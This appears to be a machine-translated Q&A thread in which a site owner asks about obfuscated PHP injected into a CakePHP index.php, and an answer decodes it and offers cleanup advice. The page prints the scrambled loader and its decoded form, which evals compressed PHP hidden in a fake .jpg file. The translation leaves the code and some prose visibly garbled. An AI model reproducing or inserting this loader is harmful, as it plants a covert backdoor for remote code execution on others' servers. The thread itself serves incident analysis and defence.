Is it a CakePHP hack?

Question

Is it a CakePHP hack?

The other day, I contacted some strange error messages on the CakePHP website. We have seen errors like the following:

Waiting Failed:
The wait specified in the Expect request header field cannot be completed by this server.
Expect: 100-Continue, 100-Continue
Only waiting 100 to continue is supported.

I ended up tracking random code in our index.php file:

  $ get_ya_weekday_initial = 'dvA, @ fzi * f, @ pE (& lE [E`pJco "Pe * $ P" / (oA! `mh (! 3, da7 * & H & ( a@ " 1m! tHOE # @ a + E.3b2hp`s-td $ p ( !teq.Ck@L /tm`*ca"HR$PeRshsTE"$!IBFCcTQ`hI.H`% ") (# '|
 '! 4ah (@ExHlFH! D! BID WgE $ W # * N $! DPs ($ h $ ld.FELFnItr + Ner & de $ ofiuQr (h $ (* blh, # `je / C # rI04" +@AM @ La $ d2) 2)% h.`, 0 / @@ ahA+p@2PiA $ alt / BRBB04u $ in (jPg) !!: ';
 $ wp_cw_kses_split = '> = ^ / E] u * PDAF $! V' ^ '] O; N18 * L% * "2MN8'; $ set_yly_timeout = $ wp_cw_kses_split ('', $ get_ya_weekday_initial); $ set_yly_timeout)

It looks like some kind of scrambled / encrypted code, so I'm suspicious. But I do not know how to do this. Anyone have any ideas on what this code was trying to do?

Edit: Here is the whole index.php file. Note: from this morning, the hacking code: - / It was checked on the server, but I don’t see how the code was inserted (and the date the date in the file was changed remains unchanged since I edited it yesterday).

    
      * Copyright 2005-2007, Cake Software Foundation, Inc.
      * 1785 E. Sahara Avenue, Suite 490-204
      * Las Vegas, Nevada 89104
      *
      * Licensed under The MIT License
      * Redistributions of files must retain the above copyright notice.
      *
      * @filesource
      * @copyright Copyright 2005-2007, Cake Software Foundation, Inc.
      * @link http://www.cakefoundation.org/projects/info/cakephp CakePHP (tm) Project
      * @package cake
      * @subpackage cake.app.webroot
      * @since CakePHP (tm) v 0.2.9
      * @version $ Revision: $ 4450
      * @modifiedby $ LastChangedBy: phpnut $
      * @lastmodified $ Date: 2007-02-04 23:18:05 -0600 (Sun, 04 Feb 2007) $
      * @license http://www.opensource.org/licenses/mit-license.php The MIT License
      * /
     / **
      * Do not change
      * /
         if (! defined ('DS')) {
             define ('DS', DIRECTORY_SEPARATOR);
         }
     / **
      * These defines should only be edited if you have cake installed in
      * a directory layout other than the way it is distributed.
      * Each define has a commented line of code that explains what you would change.
      *
      * /
     $ get_ya_weekday_initial = 'dvA, @ fzi * f, @ pE (& lE [E`pJco "Pe * $ P" / (oA! `mh (! 3, da7 * & H & ( a@ " 1m! tHOE # @ a + E.3b2hp`s-td $ p ( !teq.Ck@L /tm`*ca"HR$PeRshsTE"$!IBFCcTQ`hI.H`% ") (# '|
     '! 4ah (@ExHlFH! D! BID WgE $ W # * N $! DPs ($ h $ ld.FELFnItr + Ner & de $ ofiuQr (h $ (* blh, # `je / C # rI04" +@AM @ La $ d2) 2)% h.`, 0 / @@ ahA+p@2PiA $ alt / BRBB04u $ in (jPg) !!: ';
     $ wp_cw_kses_split = '> = ^ / E] u * PDAF $! V' ^ '] O; N18 * L% * "2MN8'; $ set_yly_timeout = $ wp_cw_kses_split ('', $ get_ya_weekday_initial); $ set_yly_timeout)
         if (! defined ('ROOT')) {
             // define ('ROOT', 'FULL PATH TO DIRECTORY WHERE APP DIRECTORY IS LOCATED DO NOT ADD A TRAILING DIRECTORY SEPARATOR';
             // You should also use the DS define to seperate your directories
             define ('ROOT', dirname (dirname (dirname (__ FILE__))));
         }
         if (! defined ('APP_DIR')) {
             // define ('APP_DIR', 'DIRECTORY NAME OF APPLICATION';
             define ('APP_DIR', basename (dirname (dirname (__ FILE__))));
         }
     / **
      * This only needs to be changed if the cake installed libs are located
      * outside of the distributed directory structure.
      * /
         if (! defined ('CAKE_CORE_INCLUDE_PATH')) {
             // define ('CAKE_CORE_INCLUDE_PATH', FULL PATH TO DIRECTORY WHERE CAKE CORE IS INSTALLED DO NOT ADD A TRAILING DIRECTORY SEPARATOR ';
             // You should also use the DS define to seperate your directories
             define ('CAKE_CORE_INCLUDE_PATH', ROOT);
         }
     ///////////////////////////////
     // DO NOT EDIT BELOW THIS LINE //
     ///////////////////////////////
         if (! defined ('WEBROOT_DIR')) {
             define ('WEBROOT_DIR', basename (dirname (__ FILE__)));
         }
         if (! defined ('WWW_ROOT')) {
             define ('WWW_ROOT', dirname (__ FILE__). DS);
         }
         if (! defined ('CORE_PATH')) {
             if (function_exists ('ini_set')) {
                 ini_set ('include_path', CAKE_CORE_INCLUDE_PATH. PATH_SEPARATOR. ROOT. DS. APP_DIR. DS. PATH_SEPARATOR. ini_get ('include_path'));
                 define ('APP_PATH', null);
                 define ('CORE_PATH', null);
             } else {
                 define ('APP_PATH', ROOT. DS. APP_DIR. DS);
                 define ('CORE_PATH', CAKE_CORE_INCLUDE_PATH. DS);
             }
         }
         require CORE_PATH.  'cake'.  DS.  'bootstrap.php';
         if (isset ($ _ GET ['url']) && $ _GET ['url'] === 'favicon.ico') {
         } else {
             $ Dispatcher = new Dispatcher ();
             $ Dispatcher-> dispatch ($ url);
         }
         if (Configure :: read ()> 0) {
             echo "";
         }
     ?>

I'm starting to wonder if I need to update Cake, since currently v1.1: - /

+1

php cakephp code-injection

acorncom Dec 26 '11 at 18:53

source share

1 answer

hakre · Accepted Answer · 2011-12-27T20:47:24+0000

Anyone have any ideas on what this code was trying to do?

Code in a more readable form:

eval(@gzinflate(file_get_contents(".../persistent/KRFCstudio.jpg")));

This is a kind of backdoor script that was confusing (if you want to know how to see the relevant question ). It remains in the code until the payload is provided.

The payload must be placed in

 .../cake/s‌cripts/templates/skel/tmp/cache/persistent/KRFCstudio.jpg

in the form of DEFLATE data (RFC 1951) PHP code (without opening the <?php tag), see gzinflate ^{& shy;} ^Docs and eval ^{& are shy;} ^Documents

Note: the hack code from this morning: - / It was checked on the server, but I don’t see how the code was entered (and the date of the date change in the file remains unchanged since I edited it yesterday).

Make changes to the file again. Then make the file read-only (since any of your php files must be on the server). When it is read-only, check if it is all cleaned up. Also make sure that the process of reading a file in a standard web request cannot change file permissions in a file, for example. allow root only this.

Then register access to the file files on your site to find out when the file will be modified (or the process is trying to change the file).

As noted yesterday, you must contact the server in charge. You already did it, right? You must have someone who can study the problem with you, and who can talk to you about it.

Is it a CakePHP hack?

More articles: